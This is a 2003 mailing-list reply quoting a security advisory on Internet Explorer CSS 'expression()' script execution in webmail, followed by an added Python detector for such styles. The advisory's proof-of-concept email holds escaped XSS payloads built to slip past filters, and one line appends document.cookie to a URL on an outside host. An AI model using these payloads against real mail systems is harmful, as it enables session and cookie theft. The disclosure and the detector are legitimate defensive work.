Yahoo has a massive userbase (with good reason). This kind of bug could potentially turn some IE security issues into a more readily mail-borne attack. This could be bad. Very bad. I do not see that you have contacted Yahoo on this.

> -----Original Message-----
> From: Jedi/Sector One [mailto:j@pureftpd.org]
> Sent: Thursday, October 02, 2003 2:39 PM
> To: bugtraq@securityfocus.com
> Subject: Webmails + Internet Explorer can create unwanted javascript execution
>
> Summary : Multiple web-based mail systems browsed through Internet Explorer can allow arbitrary javascript execution.
> Date : 02/10/2003
> Author : Frank Denis <j@pureftpd.org>
>
> ------------------------[ Description ]------------------------
>
> The issue described here doesn't reveal a vulnerability in a specific product. But the combination of features of Internet Explorer with features of common webmail software can create a vulnerability.
>
> 1) Internet Explorer interprets stylesheets for any HTML tag, even non-existent ones. For instance :
>
>   <xbody style="...">
>
> is not a valid tag, but attributes are evaluated.
>
> It may be considered as a bug or as a logical behavior, your mileage may vary. And this alone is not a security flaw.
>
> 2) Internet Explorer can evaluate Javascript expressions in style sheets through the "expression" keyword :
>
>   <style type="text/css">
>   a {
>     width: expression(6 * 9 + 'px');
>   }
>   </style>
>
> This is not a bug either, but a proprietary, properly documented extension.
>
> 3) Due to the increase of HTML-only email, most popular webmail software can display HTML email. In this context, Javascript _must_ be removed from every email. To achieve this result, various tricks are used by webmail software :
>
> - Removal or mangling of <script> tags,
>
> - Removal or mangling of "javascript:" urls.
>
> - Removal or mangling of properties like "onmouseover".
>
> ------------------------[ Vulnerability ]------------------------
>
> By combining 2) with 3) and if the webmail doesn't filter out stylesheets nor the "expression" keyword, any Javascript contained in a message will be executed as soon as the recipient displays it.
>
> Some webmail software have been aware of that issue for a while and they are mangling or filtering any occurrence of "expression". However, the mangling may not work when the name of the property is escaped (like "e\xpression") as CSS permits. Or it may not work in the context of non-existent-because-mangled tags. The former worked on Yahoo! until yesterday (the issue was fixed quickly after being reported, they are nice and reactive guys).
>
> But most software simply don't know about "expression". They are _not_ faulty, though. This is not a bug nor a vulnerability. "expression" is a proprietary extension. Webmails don't have to know about every possible implication of every proprietary extension of every version of every browser out there.
>
> However, when the following conditions are met, the Javascript is executed :
>
> - "expression" keywords aren't filtered/mangled by the webmail software.
>
> - The client software is Internet Explorer.
>
> - Javascript isn't disabled in the client software. Unfortunately, a lot of public webmail systems simply don't work when Javascript is disabled.
>
> ------------------------[ Impact ]------------------------
>
> Depending on the webmail software, complete control of the client's session may be possible. Private mail can be deleted or bounced to evil addresses, cookies and session identifiers can be stolen, etc.
>
> ------------------------[ Proof of concept ]------------------------
>
> Webmail software like to filter or mangle stylesheets. Some software totally remove everything inside <head>...</head> tags.
> Some software totally remove <body>...</body> tags (possibly killing style info by the way) instead of converting them to something like <div>...</div>. Some software totally remove <style>...</style> definitions but accept inline css.
>
> This is bad, because it encourages people to send broken HTML 3 code instead of well-formed, accessible XHTML documents.
>
> The following HTML email tries to add workarounds for this kind of filters in order to test whether the "expression" keyword properly gets evaluated on Internet Explorer. It currently works at least with IE 6 + Squirrelmail, Yahoo! and the software of a dozen public and ISP webmail services I have an account on.
>
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
>   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
> <head>
> <title>Webmail test</title>
> <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
> </head>
> <body style="width:expres\sion(alert(1))">
> <style type="text/css">
> h1 {
>   he\ight:e\xpression(alert(2));
>   bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+$
> }
> </style>
> <h1 style="width:expression(alert(3))">...</h1>
> <div id="just-for-fun">
> <a href="javascript:window.open(document.location);" onmouseover="alert(4)">fireworks</a>
> </div>
> </body>
> </html>
>
> ------------------------[ Fix ]------------------------
>
> For the end user, there are four ways to avoid this issue :
>
> - Don't use Internet Explorer to connect to webmails.
> or/and
> - Disable Javascript.
> or/and
> - Configure the webmail to only display mails as plain text.
> or/and
> - Only connect to webmails when you are 100% sure the software it is powered by completely filters or mangles "expression" keywords and hope that software and the version won't change silently.
>
> --
>  __  /*-     Frank DENIS (Jedi/Sector One) <j@42-Networks.Com>     -*\  __
> \  '/ <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a> \'  /
>  \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/
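As an added example (not part of Frank Denis's advisory or of the reply above), here is a Python check that a webmail's HTML filter could run on a message before rendering it. It implements the defensive side of points 1) to 3) of the advisory: it decodes CSS backslash escapes and comments first, so that "e\xpression" and "expres\sion" are seen as "expression"; it looks at the style attribute of every tag, including non-existent ones such as <xbody>; and it inspects the body of <style> elements. It goes slightly beyond the specific case by also flagging "javascript:" URLs and on* event handlers, the other constructs the advisory says webmails strip. The sample message, the function and class names and the hex-escape decoding rule are this example's own assumptions, and it is a detector to reject or strip on, not a complete sanitizer.

```python
import re
from html.parser import HTMLParser

# CSS escape syntax (assumed here from the CSS 2 spec): a backslash followed by
# 1-6 hex digits and one optional terminating whitespace character, or a
# backslash followed by any other single character.  Both "e\xpression" and
# "\65 xpression" therefore decode to "expression".
_CSS_ESCAPE = re.compile(r'\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\(.)', re.S)
_CSS_COMMENT = re.compile(r'/\*.*?\*/', re.S)

# CSS constructs that let Internet Explorer run script from a style sheet.
_SCRIPT_IN_CSS = re.compile(r'expression\s*\(|url\s*\(\s*["\']?\s*javascript:', re.I)


def normalize_css(css):
    """Decode CSS escapes and drop comments so an obfuscated keyword reads plainly."""
    css = _CSS_COMMENT.sub('', css)

    def _decode(match):
        if match.group(1) is not None:
            code = int(match.group(1), 16)
            return chr(code) if 0 < code <= 0x10FFFF else '\ufffd'
        return match.group(2)

    return _CSS_ESCAPE.sub(_decode, css)


def css_is_dangerous(css):
    """True if the de-obfuscated CSS could execute script in Internet Explorer."""
    return _SCRIPT_IN_CSS.search(normalize_css(css)) is not None


class StyleAuditor(HTMLParser):
    """Walk every tag, known or not (as IE does), and record script-bearing CSS,
    javascript: URLs and on* event handlers as (kind, tag, snippet) findings."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._style_buf = None   # collects the text inside <style>...</style>

    def handle_starttag(self, tag, attrs):
        if tag == 'style':
            self._style_buf = []
        for name, value in attrs:
            value = value or ''
            if name == 'style' and css_is_dangerous(value):
                self.findings.append(('style-attribute', tag, value))
            elif name.startswith('on'):
                self.findings.append(('event-handler', tag, name + '=' + value))
            elif name in ('href', 'src', 'action'):
                # Drop whitespace and control characters before looking at the scheme.
                scheme_view = re.sub(r'[\s\x00-\x1f]', '', value).lower()
                if scheme_view.startswith('javascript:'):
                    self.findings.append(('script-url', tag, value))

    def handle_data(self, data):
        if self._style_buf is not None:
            self._style_buf.append(data)

    def handle_endtag(self, tag):
        if tag == 'style':
            self._flush_style()

    def _flush_style(self):
        if self._style_buf is None:
            return
        css = ''.join(self._style_buf)
        self._style_buf = None
        if css_is_dangerous(css):
            self.findings.append(('style-element', 'style', css.strip()))


def audit_html(document):
    """Return every finding for one HTML message body (empty list means clean)."""
    auditor = StyleAuditor()
    auditor.feed(document)
    auditor.close()
    auditor._flush_style()   # an unterminated <style> is still inspected
    return auditor.findings


# Constructed sample message reusing the advisory's evasion tricks: a style on a
# non-existent tag, escaped property names, plain inline expression(), plus a
# benign inline style that must not be flagged.
SAMPLE_MAIL = r"""<xbody style="width:expres\sion(alert(1))">
<style type="text/css">
h1 { he\ight:e\xpression(alert(2)); }
</style>
<h1 style="width:expression(alert(3))">hello</h1>
<p style="color: red; width: 10px">benign</p>
<a href="javascript:alert(4)" onmouseover="alert(5)">link</a>
</xbody>
"""

if __name__ == '__main__':
    for kind, tag, snippet in audit_html(SAMPLE_MAIL):
        print(f'{kind:16} <{tag}> {snippet!r}')
```

A filter built on this would reject the message or drop the offending attribute or element; note that the decode step must run before any keyword match, because matching "expression" on the raw text is exactly what the "e\xpression" trick defeats.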